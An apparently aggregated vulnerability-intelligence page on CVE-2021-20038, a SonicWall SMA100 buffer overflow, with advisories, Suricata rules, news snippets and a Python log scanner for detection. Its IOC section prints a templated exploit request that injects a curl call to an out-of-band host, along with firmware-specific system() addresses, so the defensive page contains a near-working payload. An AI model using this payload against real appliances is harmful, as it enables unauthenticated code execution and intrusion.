CVE-2021-20038
Published 2021-12-08
Priority: P1 · 100 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerability · due 2022-02-11
Exploited in the wild
EPSS: 99.91% (100.0th percentile)
A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
Affected
18 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sonicwall | sma_200_firmware | — | — |
| sonicwall | sma_200_firmware | — | — |
| sonicwall | sma_200_firmware | — | — |
| sonicwall | sma_210_firmware | — | — |
| sonicwall | sma_210_firmware | — | — |
| sonicwall | sma_210_firmware | — | — |
| sonicwall | sma_400_firmware | — | — |
| sonicwall | sma_400_firmware | — | — |
| sonicwall | sma_400_firmware | — | — |
| sonicwall | sma_410_firmware | — | — |
| sonicwall | sma_410_firmware | — | — |
| sonicwall | sma_410_firmware | — | — |
| sonicwall | sma_500v_firmware | — | — |
| sonicwall | sma_500v_firmware | — | — |
| sonicwall | sma_500v_firmware | — | — |
| sonicwall | sonicwall_sma100 | — | — |
| sonicwall | sonicwall_sma100 | — | — |
| sonicwall | sonicwall_sma100 | — | — |
Detection & IOCs (extracted from sources)
command
GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat("A", 518)}} HTTP/1.1
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M1"; flow:established,to_server; urilen:>400; threshold: type threshold, track by_src, count 10, seconds 30; http.request_line; content:"GET /%"; startswith; pcre:"/^[a-zA-Z0-9]{2}[%a-zA-Z0-9]{9}(?P<addr>(?:[%a-zA-Z0-9]{3}){4})(?P=addr)/R"; content:"%64%b8%06%08"; within:55; fast_pattern; content:"?"; reference:cve,2021-20038; classtype:attempted-admin; sid:2034984; rev:2; metadata:attack_target Server, created_at 2022_01_26, cve CVE_2021_20038, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_03_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
bytes
%64%b8%06%08
bytes
%08%b7%06%08
bytes
%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf
- The exploit payload encodes a stack address (%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf) followed by a system() address specific to the firmware version, then a shell command injection via brace expansion (curl), and a 518-byte 'A' padding, all within a single GET request URI.
- Two distinct system() address values are used depending on firmware version: %08%b7%06%08 targets firmware 10.2.1.2-24sv, and %64%b8%06%08 targets firmware 10.2.1.1-17sv/19sv.
- The vulnerability is in the SMA100 Apache httpd mod_cgi module environment variables; code executes as the 'nobody' user. Affected appliances: SMA 200, 210, 400, 410, 500v.
- UNC6148 threat actor exploited CVE-2021-20038 (among other n-days) to steal administrator credentials before the targeted SMA appliance was updated to firmware 10.2.1.15-81sv. Credential theft artifact: persist.db database and certificate files.
- OVERSTEP rootkit is deployed as a .ELF file decoded from base64 on SMA 100 series appliances; it establishes a reverse shell, steals passwords, and hides components using user-mode rootkit capabilities. Analysts should acquire disk images to detect it, as the rootkit interferes with live forensics.
- OVERSTEP can steal sensitive files such as the persist.db database and certificate files, which give hackers access to credentials, OTP seeds, and certificates that allow persistence.
- Threshold-based detection: trigger on 10 or more exploit attempts from the same source IP within 30 seconds to reduce false positives.
- The system() address offsets in the exploit payload are firmware-version-specific. %08%b7%06%08 applies only to 10.2.1.2-24sv and %64%b8%06%08 applies only to 10.2.1.1-17sv/19sv; detections relying solely on one address will miss exploitation attempts targeting the other firmware version.
- The Nuclei template uses a clusterbomb attack combining two prefix_addr and two system_addr payloads, requiring up to 2 HTTP requests (max-request: 2) to cover both firmware variants; detection infrastructure must account for multi-request exploit sequences.
- Incident responders could not confirm which specific vulnerability UNC6148 exploited for initial credential theft; CVE-2021-20038 is one of several candidates (also CVE-2024-38475, CVE-2021-20035, CVE-2021-20039, CVE-2025-32819).
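The matching logic of the Suricata rules quoted on this page, applied to web access logs as an added example (not code from this page or from the rule authors): it checks for both firmware-specific system() address encodings, so neither variant is missed, and applies the 10-in-30-seconds per-source threshold. The combined access-log layout, the function names and the sample lines are assumptions constructed for illustration; the rules' positional pcre/within checks are simplified to "marker appears before the ?".

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Percent-encoded system() addresses quoted on this page -> firmware they target.
SYSTEM_ADDR_MARKERS = {
    "%64%b8%06%08": "10.2.1.1-17sv/19sv",
    "%08%b7%06%08": "10.2.1.2-24sv",
}
MIN_URI_LEN = 400                               # urilen:>400 in both Suricata rules
THRESHOLD, WINDOW = 10, timedelta(seconds=30)   # count 10, seconds 30, track by_src

# Assumption: Apache/nginx "combined" access-log layout.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET (?P<uri>\S+) ')


def classify_uri(uri):
    """Return the targeted firmware if the URI has the rule's shape, else None."""
    if len(uri) <= MIN_URI_LEN or not uri.startswith("/%") or "?" not in uri:
        return None
    path = uri.split("?", 1)[0].lower()   # case-folded: broader than the rule's exact match
    for marker, firmware in SYSTEM_ADDR_MARKERS.items():
        if marker in path:
            return firmware
    return None


def scan(lines):
    """Return (hits, alerts); an alert fires on every 10th hit per source within 30 s."""
    hits, alerts = [], []
    recent = defaultdict(deque)           # src -> deque of (timestamp, firmware)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        firmware = classify_uri(m["uri"])
        if firmware is None:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        hits.append((m["src"], ts, firmware))
        window = recent[m["src"]]
        window.append((ts, firmware))
        while ts - window[0][0] > WINDOW:     # drop hits older than the window
            window.popleft()
        if len(window) >= THRESHOLD:
            alerts.append({"src": m["src"], "first_seen": window[0][0],
                           "firmware": sorted({fw for _, fw in window})})
            window.clear()
    return hits, alerts


def constructed_sample():
    """Constructed log lines; filler bytes stand in for the real address prefix."""
    def line(src, sec, uri):
        return f'{src} - - [26/Jan/2022:12:00:{sec:02d} +0000] "GET {uri} HTTP/1.1" 404 0 "-" "-"'
    markers = list(SYSTEM_ADDR_MARKERS)

    def probe(i):
        return "/" + "%41" * 4 + markers[i % 2] + "?" + "A" * 420
    out = [line("203.0.113.5", s, probe(s)) for s in range(10)]       # burst, both variants
    out += [line("198.51.100.7", s, probe(0)) for s in (5, 25, 45)]   # below threshold
    out.append(line("192.0.2.10", 7, "/search?q=" + "A" * 500))       # long but benign
    out.append(line("192.0.2.11", 8, "/%41" + markers[0] + "?x=1"))   # marker, short URI
    return out


if __name__ == "__main__":
    hits, alerts = scan(constructed_sample())
    print(len(hits), "matching requests;", alerts)
```

The sub-threshold hits are returned separately so that slow, low-volume attempts can still be reviewed even though they raise no alert.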
CVSS provenance
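| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |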
GHSA
GHSA-jmhc-vxg9-h2g4: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attac
ghsa_unreviewed·2021-12-09
CVE-2021-20038 [CRITICAL] CWE-121 GHSA-jmhc-vxg9-h2g4: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attac
A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
VulnCheck
SonicWall SMA 100 Appliances Stack-Based Buffer Overflow Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-20038 [CRITICAL] CWE-121 SonicWall SMA 100 Appliances Stack-Based Buffer Overflow Vulnerability
SonicWall SMA 100 devices are vulnerable to an unauthenticated stack-based buffer overflow vulnerability where exploitation can result in code execution.
Affected: SonicWall SMA 100 Appliances
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.cisa.gov/uscert/ncas/alerts/aa23-040a; https://cisa.gov/news-events/alerts/2022/04/27/2021-top-routinely-exploited-vulnerabilities; https://cisa.gov/news-events/cybersecurity-advisories/aa22-117a; https://cisa.gov/news-events/cybersecurity-advisories/aa23-040a; https://4502402.fs1.hubspotusercontent-na1.net/hubfs/45
CISA
SonicWall SMA 100 Appliances Stack-Based Buffer Overflow Vulnerability
cisa·2022-01-28·CVSS 9.8
CVE-2021-20038 [CRITICAL] CWE-121 SonicWall SMA 100 Appliances Stack-Based Buffer Overflow Vulnerability
Vulnerability: SonicWall SMA 100 Appliances Stack-Based Buffer Overflow Vulnerability
Affected: SonicWall SMA 100 Appliances
SonicWall SMA 100 devices are vulnerable to an unauthenticated stack-based buffer overflow vulnerability where exploitation can result in code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-20038
Remediation Due Date: 2022-02-11
Suricata
ET WEB_SERVER SonicWall SMA Unauthenticated sonicfiles Confused Deputy (CVE-2021-20042)
suricata·2025-04-14·CVSS 9.8
CVE-2021-20042 [CRITICAL] ET WEB_SERVER SonicWall SMA Unauthenticated sonicfiles Confused Deputy (CVE-2021-20042)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SERVER SonicWall SMA Unauthenticated sonicfiles Confused Deputy (CVE-2021-20042)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/fileshare/sonicfiles/sonicfiles|3f|"; fast_pattern; content:"RacNumber|3d|25"; content:"Arg1|3d|"; pcre:"/^[a-z]+\x3a\x2f{2}/R"; reference:url,www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/; reference:cve,2021-20042; classtype:web-application-attack; sid:2061554; rev:1; metadata:affected_product SonicWall, attack_target Server, tls_state TLSDecrypt, created_at 2025_04_14, cve CVE_2021_20042, deployment Perimeter, deployment Internal,
Suricata
ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M1
suricata·2022-01-26·CVSS 9.8
CVE-2021-20038 [CRITICAL] ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M1
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M1"; flow:established,to_server; urilen:>400; threshold: type threshold, track by_src, count 10, seconds 30; http.request_line; content:"GET /%"; startswith; pcre:"/^[a-zA-Z0-9]{2}[%a-zA-Z0-9]{9}(?P<addr>(?:[%a-zA-Z0-9]{3}){4})(?P=addr)/R"; content:"%64%b8%06%08"; within:55; fast_pattern; content:"?"; reference:cve,2021-20038; classtype:attempted-admin; sid:2034984; rev:2; metadata:attack_target Server, created_at 2022_01_26, cve CVE_2021_20038, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_03_08, mitre_tactic_id
Suricata
ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M2
suricata·2022-01-26·CVSS 9.8
CVE-2021-20038 [CRITICAL] ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M2
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M2"; flow:established,to_server; urilen:>400; threshold: type threshold, track by_src, count 10, seconds 30; http.request_line; content:"GET /%"; startswith; pcre:"/^[a-zA-Z0-9]{2}[%a-zA-Z0-9]{9}(?P<addr>(?:[%a-zA-Z0-9]{3}){4})(?P=addr)/R"; content:"%08%b7%06%08"; within:55; fast_pattern; content:"?"; reference:cve,2021-20038; classtype:attempted-admin; sid:2034985; rev:2; metadata:attack_target Server, created_at 2022_01_26, cve CVE_2021_20038, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_03_08, mitre_tactic_id
Nuclei
SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution
nuclei·CVSS 9.8
CVE-2021-20038 [CRITICAL] SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution
A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
Template:
id: CVE-2021-20038
info:
  name: SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution
  author: dwisiswant0, jbaines-r7
  severity: critical
  description: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user
Tenable
Exploitation of CVE-2025-40602 chained with CVE-2025-23006
blogs_tenable·2025-12-17·CVSS 9.8
[CRITICAL] Exploitation of CVE-2025-40602 chained with CVE-2025-23006
Bleepingcomputer
SonicWall urges admins to patch critical RCE flaw in SMA 100 devices
blogs_bleepingcomputer·2025-07-24·CVSS 6.5
CVE-2025-40599 [MEDIUM] SonicWall urges admins to patch critical RCE flaw in SMA 100 devices
## SonicWall urges admins to patch critical RCE flaw in SMA 100 devices
## Sergiu Gatlan
SonicWall urges customers to patch SMA 100 series appliances against a critical authenticated arbitrary file upload vulnerability that can let attackers gain remote code execution.
The security flaw (tracked as CVE-2025-40599) is caused by an unrestricted file upload weakness in the devices' web management interfaces, which can allow remote threat actors with administrative privileges to upload arbitrary files to the system.
"SonicWall strongly recommends that users of the SMA 100 series products (SMA 210, 410, and 500v) upgrade to the specified fixed release version to remediate this vulnerability," the company said. "This vulnerability does not affect SonicWall SSL VPN SMA1000 series products or
Bleepingcomputer
SonicWall SMA devices hacked with OVERSTEP rootkit tied to ransomware
blogs_bleepingcomputer·2025-07-16·CVSS 6.5
[MEDIUM] SonicWall SMA devices hacked with OVERSTEP rootkit tied to ransomware
## SonicWall SMA devices hacked with OVERSTEP rootkit tied to ransomware
## Ionut Ilascu
A threat actor has been deploying a previously unseen malware called OVERSTEP that modifies the boot process of fully-patched but no longer supported SonicWall Secure Mobile Access appliances.
The backdoor is a user-mode rootkit that allows hackers to hide malicious components, maintain persistent access on the device, and steal sensitive credentials.
Researchers at Google Threat Intelligence Group (GTIG) observed the rootkit in attacks that may have relied on “an unknown, zero-day remote code execution vulnerability”.
The threat actor is tracked as UNC6148 and has been operating since at least last October, with an organization being targeted as recently as May.
Because files stolen from the vic
Tenable
CVE-2025-23006: SonicWall Secure Mobile Access (SMA) 1000 Zero-Day Reportedly Exploited
blogs_tenable·2025-01-23·CVSS 9.8
[CRITICAL] CVE-2025-23006: SonicWall Secure Mobile Access (SMA) 1000 Zero-Day Reportedly Exploited
Tenable
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
blogs_tenable·2023-08-03
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
Tenable
South Korean and American Agencies Release Joint Advisory on North Korean Ransomware
blogs_tenable·2023-02-16
South Korean and American Agencies Release Joint Advisory on North Korean Ransomware
Sentinelone
What Are Initial Access Brokers? - A Comprehensive Guide 101
blogs_sentinelone·2022-08-17
What Are Initial Access Brokers? - A Comprehensive Guide 101
From ransomware operators like LockBit and BlackBasta to APTs striking for or against Russian or Chinese interests, threat actors of various stripes all need one thing to get their operations off the ground: initial access to an organization’s network.
Such access can be bought on a variety of trading forums from cyber criminals who specialize in running low-risk phishing campaigns and credential theft operations, or in scanning enterprise networks for known remote code execution (RCE) software vulnerabilities.
Because of the ease with which initial access can now be obtained thanks to poor patch management and lax controls over identity and user credentials, there exists a market where supply is outstripping demand, and vendors involved in selling initial access are lowering their pric
Checkpoint
31st January– Threat Intelligence Report
blogs_checkpoint·2022-01-31
CVE-2021-20038 31st January– Threat Intelligence Report
## 31st January– Threat Intelligence Report
For the latest discoveries in cyber research for the week of 31st January, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
A hacktivist group from Belarus called “Belarusian Cyber Partisans” has breached the computer systems of Belarusian Railways. Threat actors claim to have encrypted the network and are extorting the Belarusian government, asking for the release of 50 political prisoners and a pledge from Belarusian Railways to halt transpor
Tenable
SonicWall Urges Users to Patch Several Vulnerabilities in Secure Mobile Access Products (CVE-2021-20038)
blogs_tenable·2021-12-08·CVSS 9.8
[CRITICAL] SonicWall Urges Users to Patch Several Vulnerabilities in Secure Mobile Access Products (CVE-2021-20038)
Greynoiseio
NoiseLetter
blogs_greynoiseio
NoiseLetter
https://github.com/jbaines-r7/badblood
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026
https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-20038
2021-12-08: Published
2022-01-28: Added to CISA KEV
Exploited in the wild